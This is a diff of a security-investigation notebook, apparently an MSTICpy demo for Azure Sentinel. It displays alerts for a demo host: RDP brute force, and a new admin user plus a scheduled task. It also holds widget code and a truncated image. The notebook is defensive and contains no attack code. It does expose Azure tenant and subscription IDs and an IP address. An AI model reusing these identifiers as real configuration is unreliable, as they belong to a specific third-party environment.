+       "      <td>Detection</td>\n",
+       "      <td>40dcc8bf-0478-4f3b-b275-ed0a94f2c013</td>\n",
+       "      <td>asihuntomsworkspacerg</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Scheduled Alerts</td>\n",
+       "      <td></td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>BlackHatDemoHos</td>\n",
+       "      <td>BlackHatDemoHos</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>True</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                               TenantId             TimeGenerated  \\\n",
+       "0  52b1ab41-869e-4138-9e40-2a4457f09bf0 2020-07-10 19:09:23+00:00   \n",
+       "1  52b1ab41-869e-4138-9e40-2a4457f09bf0 2020-07-10 19:09:23+00:00   \n",
+       "2  52b1ab41-869e-4138-9e40-2a4457f09bf0 2020-07-10 18:41:18+00:00   \n",
+       "\n",
+       "               AlertDisplayName                     AlertName Severity  \\\n",
+       "0  Suspicious Activity Detected  Suspicious Activity Detected   Medium   \n",
+       "1  Suspicious Activity Detected  Suspicious Activity Detected   Medium   \n",
+       "2               RDP Brute Force               RDP Brute Force   Medium   \n",
+       "\n",
+       "                                                                                           Description  \\\n",
+       "0  Analysis of host data has detected a sequence of one or more processes running on BlackHatDemoHo...   \n",
+       "1  Analysis of host data has detected a sequence of one or more processes running on BlackHatDemoHo...   \n",
+       "2                                                                                                        \n",
+       "\n",
+       "           ProviderName VendorName                      VendorOriginalId  \\\n",
+       "0  Detection-WarmPathV2  Microsoft  e3549ae5-3e95-4be7-8ba8-9e1b9d97e926   \n",
+       "1  Detection-WarmPathV2  Microsoft  e3549ae5-3e95-4be7-8ba8-9e1b9d97e926   \n",
+       "2  ASI Scheduled Alerts  Microsoft  52c2edec-dc25-445e-b81a-b54bf44570a3   \n",
+       "\n",
+       "                                              SystemAlertId  \\\n",
+       "0  2518078950729219999_e3549ae5-3e95-4be7-8ba8-9e1b9d97e926   \n",
+       "1                      95ba8569-5df3-351e-b082-ce9666943e0b   \n",
+       "2                      cf949989-cf21-7ae1-5c02-56122b111f43   \n",
+       "\n",
+       "                                                                                            ResourceId  \\\n",
+       "0  /subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/BlackHatDemo/providers/Micros...   \n",
+       "1  /subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/BlackHatDemo/providers/Micros...   \n",
+       "2                                                                                                        \n",
+       "\n",
+       "                       SourceComputerId  \\\n",
+       "0  73a015ec-e2b6-4bf7-b353-ebeafb54254e   \n",
+       "1  73a015ec-e2b6-4bf7-b353-ebeafb54254e   \n",
+       "2                                         \n",
+       "\n",
+       "                                                                   AlertType  \\\n",
+       "0                                                      VM_SuspiciousActivity   \n",
+       "1                                                      VM_SuspiciousActivity   \n",
+       "2  52b1ab41-869e-4138-9e40-2a4457f09bf0_765132a3-cf2f-40cf-b45c-cd6be9b942b7   \n",
+       "\n",
+       "  ConfidenceLevel  ConfidenceScore  IsIncident              StartTimeUtc  \\\n",
+       "0         Unknown              0.0       False 2020-07-10 18:28:47+00:00   \n",
+       "1         Unknown              0.0       False 2020-07-10 18:28:47+00:00   \n",
+       "2         Unknown              NaN       False 2020-07-10 18:27:28+00:00   \n",
+       "\n",
+       "                 EndTimeUtc         ProcessingEndTime  \\\n",
+       "0 2020-07-10 18:37:39+00:00 2020-07-10 19:09:54+00:00   \n",
+       "1 2020-07-10 18:37:39+00:00 2020-07-10 19:09:54+00:00   \n",
+       "2 2020-07-10 18:27:39+00:00 2020-07-10 18:41:18+00:00   \n",
+       "\n",
+       "                                                                                      RemediationSteps  \\\n",
+       "0  [\\r\\n  \"Review each of the individual line items in this alert to see if you recognize them as l...   \n",
+       "1  [\\r\\n  \"Review each of the individual line items in this alert to see if you recognize them as l...   \n",
+       "2                                                                                                        \n",
+       "\n",
+       "                                                                                    ExtendedProperties  \\\n",
+       "0  {\\r\\n  \"Machine Name\": \"BlackHatDemoHos\",\\r\\n  \"Command List\": \"FTP session was established.\\nNe...   \n",
+       "1  {\\r\\n  \"Machine Name\": \"BlackHatDemoHos\",\\r\\n  \"Command List\": \"FTP session was established.\\nNe...   \n",
+       "2  {\\r\\n  \"Query\": \"let bruteforce_hosts = (\\r\\nSecurityEvent\\r\\n| where Computer contains \\\"blackh...   \n",
+       "\n",
+       "                                                                                              Entities  \\\n",
+       "0  [\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"HostName\": \"BlackHatDemoHos\",\\r\\n    \"AzureID\": \"/subscripti...   \n",
+       "1  [\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"HostName\": \"BlackHatDemoHos\",\\r\\n    \"AzureID\": \"/subscripti...   \n",
+       "2  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"174.127.235.80\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n ...   \n",
+       "\n",
+       "  SourceSystem               WorkspaceSubscriptionId WorkspaceResourceGroup  \\\n",
+       "0    Detection  40dcc8bf-0478-4f3b-b275-ed0a94f2c013  asihuntomsworkspacerg   \n",
+       "1    Detection  40dcc8bf-0478-4f3b-b275-ed0a94f2c013  asihuntomsworkspacerg   \n",
+       "2    Detection  40dcc8bf-0478-4f3b-b275-ed0a94f2c013  asihuntomsworkspacerg   \n",
+       "\n",
+       "  ExtendedLinks            ProductName ProductComponentName  \\\n",
+       "0                Azure Security Center                        \n",
+       "1                Azure Security Center                        \n",
+       "2                       Azure Sentinel     Scheduled Alerts   \n",
+       "\n",
+       "                                                                                             AlertLink  \\\n",
+       "0  https://portal.azure.com/#blade/Microsoft_Azure_Security/AlertBlade/alertId/2518078950729219999_...   \n",
+       "1  https://portal.azure.com/#blade/Microsoft_Azure_Security/AlertBlade/alertId/2518078950729219999_...   \n",
+       "2                                                                                                        \n",
+       "\n",
+       "            Type         Computer     src_hostname src_accountname  \\\n",
+       "0  SecurityAlert  BlackHatDemoHos  BlackHatDemoHos                   \n",
+       "1  SecurityAlert  BlackHatDemoHos  BlackHatDemoHos                   \n",
+       "2  SecurityAlert  BlackHatDemoHos  BlackHatDemoHos                   \n",
+       "\n",
+       "  src_procname  host_match  acct_match  proc_match  \n",
+       "0                     True       False       False  \n",
+       "1                     True       False       False  \n",
+       "2                     True       False       False  "
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "related_alerts = qry_prov.SecurityAlert.list_related_alerts(start=start, end=end, host_name=host_name)\n",
+    "display(related_alerts)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 25,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "e01cb17411334c0bb0d82523190dbb43",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(Text(value='', description='Filter alerts by title:', style=DescriptionStyle(description_width=…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<hr>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "            <h3>Alert: 'Suspicious Activity Detected'</h3>\n",
+       "            <b>Alert_time:</b> 2020-07-10 18:28:47+00:00,\n",
+       "            <b>Compr_entity:</b> BlackHatDemoHos,\n",
+       "            <b>Alert_id:</b> 2518078950729219999_e3549ae5-3e95-4be7-8ba8-9e1b9d97e926\n",
+       "            <table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>0</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>TenantId</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <td>2020-07-10 19:09:23+00:00</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>AlertDisplayName</th>\n",
+       "      <td>Suspicious Activity Detected</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>AlertName</th>\n",
+       "      <td>Suspicious Activity Detected</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Severity</th>\n",
+       "      <td>Medium</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Description</th>\n",
+       "      <td>Analysis of host data has detected a sequence of one or more processes running on BlackHatDemoHos that have historically been associated with malicious activity. While individual commands may appear benign the alert is scored based on an aggregation of these commands. This could either be legitimate activity, or an indication of a compromised host.</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ProviderName</th>\n",
+       "      <td>Detection-WarmPathV2</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>VendorName</th>\n",
+       "      <td>Microsoft</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>VendorOriginalId</th>\n",
+       "      <td>e3549ae5-3e95-4be7-8ba8-9e1b9d97e926</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>SystemAlertId</th>\n",
+       "      <td>2518078950729219999_e3549ae5-3e95-4be7-8ba8-9e1b9d97e926</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ResourceId</th>\n",
+       "      <td>/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/BlackHatDemo/providers/Microsoft.Compute/virtualMachines/BlackHatDemoHost</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>SourceComputerId</th>\n",
+       "      <td>73a015ec-e2b6-4bf7-b353-ebeafb54254e</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>AlertType</th>\n",
+       "      <td>VM_SuspiciousActivity</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ConfidenceLevel</th>\n",
+       "      <td>Unknown</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ConfidenceScore</th>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>IsIncident</th>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>StartTimeUtc</th>\n",
+       "      <td>2020-07-10 18:28:47+00:00</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>EndTimeUtc</th>\n",
+       "      <td>2020-07-10 18:37:39+00:00</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ProcessingEndTime</th>\n",
+       "      <td>2020-07-10 19:09:54+00:00</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>RemediationSteps</th>\n",
+       "      <td>[\\r\\n  \"Review each of the individual line items in this alert to see if you recognize them as legitimate administrative activity.\"\\r\\n]</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ExtendedProperties</th>\n",
+       "      <td>{'Machine Name': 'BlackHatDemoHos', 'Command List': 'FTP session was established.\n",
+       "New user was created.\n",
+       "PING command was executed.\n",
+       "Administrators group members enumeration.\n",
+       "New user was added to the Administrators group.\n",
+       "New scheduled task was created.', 'Account List': 'BLACKHATDEMOHOS\\timvic', 'compromised host': 'BlackHatDemoHos', 'resourceType': 'Virtual Machine', 'ServiceId': '14fa08c7-c48e-4c18-950c-8148024b4398', 'ReportingSystem': 'Azure'}</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Entities</th>\n",
+       "      <td>[{'$id': '4', 'HostName': 'BlackHatDemoHos', 'AzureID': '/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/BlackHatDemo/providers/Microsoft.Compute/virtualMachines/BlackHatDemoHost', 'OMSAgentID': '73a015ec-e2b6-4bf7-b353-ebeafb54254e', 'Type': 'host'}, {'$id': '5', 'Name': 'timvic', 'NTDomain': 'BLACKHATDEMOHOS', 'Host': {'$ref': '4'}, 'IsDomainJoined': True, 'Type': 'account'}]</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>SourceSystem</th>\n",
+       "      <td>Detection</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>WorkspaceSubscriptionId</th>\n",
+       "      <td>40dcc8bf-0478-4f3b-b275-ed0a94f2c013</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>WorkspaceResourceGroup</th>\n",
+       "      <td>asihuntomsworkspacerg</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ExtendedLinks</th>\n",
+       "      <td></td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ProductName</th>\n",
+       "      <td>Azure Security Center</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ProductComponentName</th>\n",
+       "      <td></td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>AlertLink</th>\n",
+       "      <td>https://portal.azure.com/#blade/Microsoft_Azure_Security/AlertBlade/alertId/2518078950729219999_e3549ae5-3e95-4be7-8ba8-9e1b9d97e926/subscriptionId/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroup/BlackHatDemo/referencedFrom/alertDeepLink/location/centralus</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Type</th>\n",
+       "      <td>SecurityAlert</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Computer</th>\n",
+       "      <td>BlackHatDemoHos</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>src_hostname</th>\n",
+       "      <td>BlackHatDemoHos</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>src_accountname</th>\n",
+       "      <td></td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>src_procname</th>\n",
+       "      <td></td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>host_match</th>\n",
+       "      <td>True</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>acct_match</th>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>proc_match</th>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>CompromisedEntity</th>\n",
+       "      <td>BlackHatDemoHos</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table><br/><h3>ExtendedProperties:</h3><table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>0</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>Machine Name</th>\n",
+       "      <td>BlackHatDemoHos</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Command List</th>\n",
+       "      <td>FTP session was established.\\nNew user was created.\\nPING command was executed.\\nAdministrators group members enumeration.\\nNew user was added to the Administrators group.\\nNew scheduled task was created.</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Account List</th>\n",
+       "      <td>BLACKHATDEMOHOS\\timvic</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>compromised host</th>\n",
+       "      <td>BlackHatDemoHos</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>resourceType</th>\n",
+       "      <td>Virtual Machine</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ServiceId</th>\n",
+       "      <td>14fa08c7-c48e-4c18-950c-8148024b4398</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ReportingSystem</th>\n",
+       "      <td>Azure</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table><br/><h3>Entities:</h3><br/>{ &#x27;AdditionalData&#x27;: {},,   &#x27;AzureID&#x27;: &#x27;/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/BlackHatDemo/providers/Microsoft.Compute/virtualMachines/BlackHatDemoHost&#x27;,,   &#x27;HostName&#x27;: &#x27;BlackHatDemoHos&#x27;,,   &#x27;OMSAgentID&#x27;: &#x27;73a015ec-e2b6-4bf7-b353-ebeafb54254e&#x27;,,   &#x27;Type&#x27;: &#x27;host&#x27;}<br/>{ &#x27;AdditionalData&#x27;: {},,   &#x27;Host&#x27;: { &#x27;AdditionalData&#x27;: {},,             &#x27;AzureID&#x27;: &#x27;/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/BlackHatDemo/providers/Microsoft.Compute/virtualMachines/BlackHatDemoHost&#x27;,,             &#x27;HostName&#x27;: &#x27;BlackHatDemoHos&#x27;,,             &#x27;OMSAgentID&#x27;: &#x27;73a015ec-e2b6-4bf7-b353-ebeafb54254e&#x27;,,             &#x27;Type&#x27;: &#x27;host&#x27;},,   &#x27;IsDomainJoined&#x27;: True,,   &#x27;NTDomain&#x27;: &#x27;BLACKHATDEMOHOS&#x27;,,   &#x27;Name&#x27;: &#x27;timvic&#x27;,,   &#x27;Type&#x27;: &#x27;account&#x27;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "related_alerts['CompromisedEntity'] = related_alerts['Computer']\n",
+    "def disp_full_alert(alert):\n",
+    "    global related_alert\n",
+    "    related_alert = SecurityAlert(alert)\n",
+    "    return nbdisplay.format_alert(related_alert, show_entities=True)\n",
+    "\n",
+    "rel_alert_select = nbwidgets.SelectAlert(alerts=related_alerts, action=disp_full_alert)\n",
+    "rel_alert_select.display()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Draw graph of alerts\n",
+    "Graphs provide a great way to understand the relationship between items. As alerts are often associated with multiple different entities being able to view a graph of alerts and their entities helps analysts identify important connections. MSTICpy provide a [feature](https://msticpy.readthedocs.io/en/latest/msticpy.data.html?highlight=create_alert_graph#msticpy.nbtools.security_alert_graph.create_alert_graph) for graphing and plotting alert information."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 26,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "image/png": "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